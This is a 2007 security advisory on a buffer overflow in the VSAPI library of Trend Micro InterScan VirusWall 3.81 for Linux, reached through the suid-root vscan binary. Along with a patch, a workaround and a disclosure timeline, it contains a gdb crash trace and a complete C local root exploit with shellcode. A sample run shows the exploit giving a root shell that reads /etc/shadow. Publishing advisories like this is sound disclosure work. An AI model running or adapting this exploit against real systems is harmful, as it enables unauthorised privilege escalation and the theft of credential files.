Buffer overflow in VSAPI library of Trend Micro VirusWall 3.81 for Linux
I - TITLE
Security advisory: Buffer overflow in VSAPI library of Trend Micro VirusWall
3.81 for Linux
II - SUMMARY
Description: Local buffer overflow vulnerability in VSAPI library allows
arbitrary code execution and leads to privilege escalation
Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com),
http://www.devtarget.org
Date: January 25th, 2007
Severity: Medium
References: http://www.devtarget.org/trendmicro-advisory-01-2007.txt
III - OVERVIEW
The Trend Micro VirusWall is a software solution to block viruses, spyware,
spam and various other kinds of threats at the Internet gateway. More
information about the product can be found online at
http://www.trendmicro.com/en/products/gateway/isvw/evaluate/overview.htm.
IV - DETAILS
The product "InterScan VirusWall 3.81 for Linux" ships a legacy library
called "libvsapi.so" which is vulnerable to a memory corruption
vulnerability. One of the applications that apparently uses this library is
called "vscan" which is set suid root by default. It was discovered that this
supporting program is prone to a classic buffer overflow vulnerability when a
particularly long command-line argument is being passed and the application
utilizes the flawed library to attempt to copy that data into a finite
buffer. On a Debian 3.1 test system for instance an attacker is required to
supply 1116 + 4 bytes to completely overwrite the EIP register and thus
execute arbitrary code with root level privileges:
# /opt/trend/ISBASE/IScan.BASE/vscan -v
Virus Scanner v3.1, VSAPI v6.810-1005
Trend Micro Inc. 1996,1997
Pattern version 684
Pattern number 56446
No scan target specified!! do nothing.
# gdb /opt/trend/ISBASE/IScan.BASE/vscan
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details. This GDB was configured as "i386-linux"...(no debugging symbols
found) Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) run `perl -e 'print "A"x1116 . "B"x4'`
Starting program: /opt/trend/ISBASE/IScan.BASE/vscan `perl -e 'print
"A"x1116 . "B"x4'`
(no debugging symbols found)
Virus Scanner v3.1, VSAPI v6.810-1005
Trend Micro Inc. 1996,1997
Pattern version 684
Pattern number 56446
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) info registers
eax 0xffffffff -1
ecx 0x24 36
edx 0x40277560 1076327776
ebx 0xbffffa03 -1073743357
esp 0xbffff818 0xbffff818
ebp 0x41414141 0x41414141
esi 0xbffff838 -1073743816
edi 0x804f008 134541320
eip 0x42424242 0x42424242
eflags 0x287 647
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
V - ANALYSIS
The severity of this vulnerability is probably "medium" as by default the
vscan file is only executable by the root user as well as members of
the "iscan" group which is created during the installation of the software:
# ls -la /opt/trend/ISBASE/IScan.BASE/vscan
-r-sr-x--- 1 root iscan 24400 2003-12-20 03:53
/opt/trend/ISBASE/IScan.BASE/vscan
However administrators may potentially have changed the default permissions
and thus granted all local users the privilege to execute the file. If this
library is also used by other applications they may also be flawed
(unchecked).
VI - EXPLOIT CODE
An exploit for this vulnerability is attached to this email and can also be
found online at http://www.devtarget.org/tmvwall381v3_exp.c. It was
successfully tested on Debian Linux 3.1 with kernel 2.6.8 and leads to a
local privilege escalation:
sebastian@debian31:~$ ./tmvwall381v3_exp
Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)
Author: Sebastian Wolfgarten, <sebastian@xxxxxxxxxxxxxx>
Date: January 3rd, 2007
Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way,
your current user id is 5002.
Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your privilege
level with id or whoami!
Virus Scanner v3.1, VSAPI v8.310-1002
Trend Micro Inc. 1996,1997
Pattern number 4.155.00
sh-2.05b# id
uid=5002(sebastian) gid=100(users) euid=0(root) groups=100(users),5001(iscan)
sh-2.05b# cat /etc/shadow
root:***REMOVED***:13372:0:99999:7:::
daemon:*:13372:0:99999:7:::
bin:*:13372:0:99999:7:::
sys:*:13372:0:99999:7:::
sync:*:13372:0:99999:7:::
games:*:13372:0:99999:7:::
[...]
iscan:!:13500:0:99999:7:::
sebastian:***REMOVED***:13500:0:99999:7:::
VII - WORKAROUND/FIX
To address this problem, the vendor has released a patch called "InterScan
VirusWall 3.81 for Linux Security Patch - VSAPI module" which is available at
http://www.trendmicro.com/download/product.asp?productid=13&show=patch and
which will replace the flawed library libvsapi.so with a newer version. Hence
all users of the VirusWall product are asked to test and install this patch
as soon as possible. Trend Micro also created a knowledge base article that
covers the problem (see
http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034124&id=EN-1034124).
Furthermore as a temporary workaround one may also simply remove the suid bit
from the vscan file and thus render any attack virtually useless by executing
# chmod -s /opt/trend/ISBASE/IScan.BASE/vscan
The same holds true for any other (suid root) application that uses this
library.
VIII - DISCLOSURE TIMELINE
02. January 2007 - Notified security@xxxxxxxxxxxxxx
05. January 2007 - Vulnerability confirmed
21. January 2007 - Release of patch
25. January 2007 - Public disclosure
/*
Title: Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on
Linux)
Author: Sebastian Wolfgarten, <sebastian@xxxxxxxxxxxxxx>
Date: January 3rd, 2007
Severity: Medium
Description:
The product "InterScan VirusWall 3.81 for Linux" ships a library called
"libvsapi.so" which is vulnerable to a memory corruption vulnerability.
One of the applications that apparently uses this library is called "vscan"
which is set suid root by default. It was discovered that this supporting
program is prone to a classic buffer overflow vulnerability when a
particularly
long command-line argument is being passed and the application utilizes the
flawed
library to attempt to copy that data into a finite buffer.
As vscan is set suid root, this leads to arbitrary code execution with root
level
privileges. However the severity of this vulnerability is probably "medium"
as by default
the vscan file is only executable by the root user as well as members of
the "iscan"
group which is created during the installation of the software.
Example:
sebastian@debian31:~$ ./tmvwall381v3_exp
Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)
Author: Sebastian Wolfgarten, <sebastian@xxxxxxxxxxxxxx>
Date: January 3rd, 2007
Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way, your
current user id is 5002.
Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your
privilege level with id or whoami!
Virus Scanner v3.1, VSAPI v8.310-1002
Trend Micro Inc. 1996,1997
Pattern number 4.155.00
sh-2.05b# id
uid=5002(sebastian) gid=100(users) euid=0(root)
groups=100(users),5001(iscan)
sh-2.05b# cat /etc/shadow
root:***REMOVED***:13372:0:99999:7:::
daemon:*:13372:0:99999:7:::
bin:*:13372:0:99999:7:::
sys:*:13372:0:99999:7:::
sync:*:13372:0:99999:7:::
games:*:13372:0:99999:7:::
man:*:13372:0:99999:7:::
lp:*:13372:0:99999:7:::
mail:*:13372:0:99999:7:::
news:*:13372:0:99999:7:::
uucp:*:13372:0:99999:7:::
proxy:*:13372:0:99999:7:::
www-data:*:13372:0:99999:7:::
backup:*:13372:0:99999:7:::
list:*:13372:0:99999:7:::
irc:*:13372:0:99999:7:::
gnats:*:13372:0:99999:7:::
nobody:*:13372:0:99999:7:::
Debian-exim:!:13372:0:99999:7:::
sshd:!:13372:0:99999:7:::
postfix:!:13500:0:99999:7:::
mysql:!:13500:0:99999:7:::
vmail:!:13500:0:99999:7:::
amavis:!:13500:0:99999:7:::
iscan:!:13500:0:99999:7:::
sebastian:***REMOVED***:13500:0:99999:7:::
Credits:
Must go to Aleph One for the shellcode and mercy for bits of the code.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define NOP 0x90
#define vscan "/opt/trend/ISBASE/IScan.BASE/vscan"
// Shellcode by Aleph One
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
int main(int argc, char *argv[], char **envp) {
// Size of the vulnerable buffer (1116 + 4 bytes to overwrite EIP)
int buff = 1120;
// Address of the shellcode
unsigned long addr;
// Temporarily used to add nops etc.
char *ptr;
printf("\nLocal root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81
on Linux)\n");
printf("Author: Sebastian Wolfgarten, <sebastian@xxxxxxxxxxxxxx>\n");
printf("Date: January 3rd, 2007\n\n");
// Check permissions on vscan executable, if this fails exploitation is
infeasible.
if (access(vscan, 01) != -1) {
printf("Okay, %s is executable and by the way, your current user id is
%d.\n",vscan,getuid());
// Allocate memory for filling the buffer
if((ptr = (char *)malloc(buff)) == NULL) {
printf("Error allocating memory!\n");
exit(-1);
}
// Determine the address of the shellcode with the inline assembly above
addr = get_sp();
// Add the NOP's to the buffer
memset(ptr, NOP, buff);
// Add the shellcode
memcpy(ptr + buff - strlen(shellcode) - 8, shellcode,
strlen(shellcode));
// The return address
*(long *)&ptr[buff - 4] = addr;
// Off we go, execute the vulnerable program
printf("\nExecuting %s. Afterwards check your privilege level with id
or whoami!\n",vscan);
execl(vscan, "vscan", ptr, NULL);
} else {
printf("Exploit failed. You seem not to have enough privileges to
execute %s, sorry.\n",vscan);
printf("Hint: Ask your local admin to add yourself to the iscan group
or let him make the vscan binary world-executable.\n");
printf("Then try again :-)\n\n");
exit(1);
}
return 0;
}